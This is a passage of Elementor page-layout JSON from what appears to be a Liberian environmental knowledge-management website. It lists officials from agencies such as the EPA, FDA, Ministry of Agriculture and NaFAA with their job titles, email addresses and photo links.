,\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br 